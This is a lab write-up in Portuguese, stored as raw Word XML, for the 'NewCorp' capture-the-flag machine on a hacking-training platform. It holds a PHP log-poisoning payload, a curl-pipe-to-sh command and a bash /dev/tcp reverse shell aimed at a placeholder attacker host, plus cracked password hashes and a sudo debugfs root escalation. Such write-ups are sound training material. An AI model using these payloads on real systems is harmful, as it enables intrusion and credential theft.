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qpo9fdnwhnm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ltxfm82m53sd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NewCorp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heading=h.dzwztbomw9nc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Realizaremos a enumeração de portas com o objetivo de identificar serviços ativos e expostos no ambiente alvo.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--min-rate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-sVC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-vvv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38400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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Identificamos duas portas expostas no ambiente: a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 (HTTP)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a porta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22 (SSH)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a aplicação web por meio da porta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iniciamos a análise da interface e dos serviços expostos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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22813"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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8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Durante o brute force de diretórios e subdomínios da aplicação web, identificamos um diretório denominado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db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ffuf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http://&lt;machine-ip&gt;/FUZZ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big.txt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651488"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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4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esse diretório via navegador, identificamos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db.sqlite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Por se tratar claramente de um banco de dados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SQLite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realizamos o download para análise local.</w:t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84400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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20900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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Em seguida, utilizamos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sqlite3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abrir e analisar o banco de dados.</w:t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Dentro do banco de dados, identificamos as tabelas disponíveis e, ao analisar seu conteúdo, localizamos a tabela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r, da qual foi possível obter as credenciais armazenadas do banco de dados. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022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1|admin|df0d078fe1083da6814a556ef576e2091830a8a3|1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2|peter|516fa3fd6bf97a4b3ff09ec93877d39005a7996d|0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3|solomon|e052b3b52a733baee5577da9aca18b4ef0f22c88|0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00200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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Utilizando o site </w:t>
      </w:r>
      <w:hyperlink r:id="rId15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CrackStation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quebrar os hashes de senha encontrados, o que nos permitiu recuperar as credenciais dos usuários e obter acesso à conta do usuário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1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">peter</w:t>
      </w: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peter:slipknot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476500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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partir desse ponto, passamos a ter acesso à aplicação web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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14600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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analisar a aplicação web, identificamos uma funcionalidade de leitura de arquivos que permite acessar determinados arquivos do sistema, incluindo o arquivo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1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log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Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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55900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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Como os arquivos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log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armazenam as requisições feitas ao serviço web, é possível escrever dados nesses arquivos. Dessa forma, identificamos a possibilidade de realizar log poisoning, injetando código malicioso nos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logs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que posteriormente seja interpretado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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executar comandos no sistema, utilizamos a função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PHP,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explorando a vulnerabilidade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log poisoning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forçar a aplicação a interpretar o payload injetado.</w:t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&lt;?php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system('id');?&gt;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66900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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Recarregamos a página para que o código malicioso fosse executado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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25500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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obter uma reverse shell, utilizamos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curl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solicitar à aplicação web a execução de um arquivo que iniciava uma conexão reversa via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bash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Com isso, a máquina alvo estabeleceu uma sessão interativa com o nosso servidor, permitindo acesso remoto ao sistema. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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isso, utilizamos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index.html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payload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acionar a reverse shell por meio da requisição feita via curl.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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&lt;?php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system('curl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&lt;machine-vpn&gt;/index.html|sh');?&gt;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#!/bin/bash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/bin/bash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/dev/tcp/&lt;machine-vpn&gt;/443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0&gt;&amp;1"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arquivo foi executado pela aplicação, possibilitando a obtenção da reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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38300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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Recarregamos a página novamente e recebemos a requisição enviada pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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89000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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Desta forma foi possível obter acesso ao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www-data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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28800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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a conexão reversa, realizamos o upgrade para uma TTY interativa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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ctr+z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-echo;fg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11300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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obter acesso ao sistema, identificamos os usuários existentes na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máquina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 constatamos que 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‘peter’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também estava presente no ambiente local. Com isso, foi possível testar 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reuso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de credenciais utilizando a senha previamente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extraída da aplicação web.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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/etc/passwd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slipknot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790700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Dessa forma, obtivemos acesso ao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1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">peter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 foi possível visualizar a flag de usuário localizada no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/home/pete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 da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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35100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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blrzuny3vsbo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077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o comando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sudo -l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identificamos quais comandos o usuário </w:t>
      </w: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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">peter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possui permissão para executar como root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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B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87500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Identificamos, por meio do comando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sudo -l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que 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peter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possui permissão para executar o binário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/usr/sbin/debugfs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privilégios de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Como o usuário possui permissão para executar o binário debugfs como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abusar dessa configuração seguindo a técnica documentada no </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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GTFOBins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permitindo a execução de um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shell (sh)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privilégios de root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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594338"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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33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Explorando essa técnica e invocando um shell através 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debugfs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obter acesso ao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4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/usr/bin/debufs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!/bin/sh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36700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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Flag do usuário root se encontra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/root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B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28800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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left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headerReference r:id="rId32" w:type="default"/>
      <w:headerReference r:id="rId33" w:type="first"/>
      <w:headerReference r:id="rId34" w:type="even"/>
      <w:footerReference r:id="rId35" w:type="default"/>
      <w:footerReference r:id="rId36" w:type="first"/>
      <w:footerReference r:id="rId37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1">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.id1vkhdxe9j" w:id="4"/>
    <w:bookmarkEnd w:id="4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-866771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41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2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3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13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-942971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50" name="image19.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image19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3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NewCorp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32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7025" cy="300615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3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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14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20.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/debugfs/" TargetMode="External"/><Relationship Id="rId27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3.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/291#" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crackstation.net/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.pn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9.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25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HwQ58r27F8kflcxNKHfwJt7XBQ==">CgMxLjAyDWgucXBvOWZkbndobm0yDmgubHR4Zm04Mm01M3NkMg5oLmR6d3p0Ym9tdzluYzIOaC5ibHJ6dW55M3ZzYm8yDWguaWQxdmtoZHhlOWo4AHIhMTlTWTA2UUZBQ0ttYXNCZ2FJOXVuOFhCWWhWYXU4cDFU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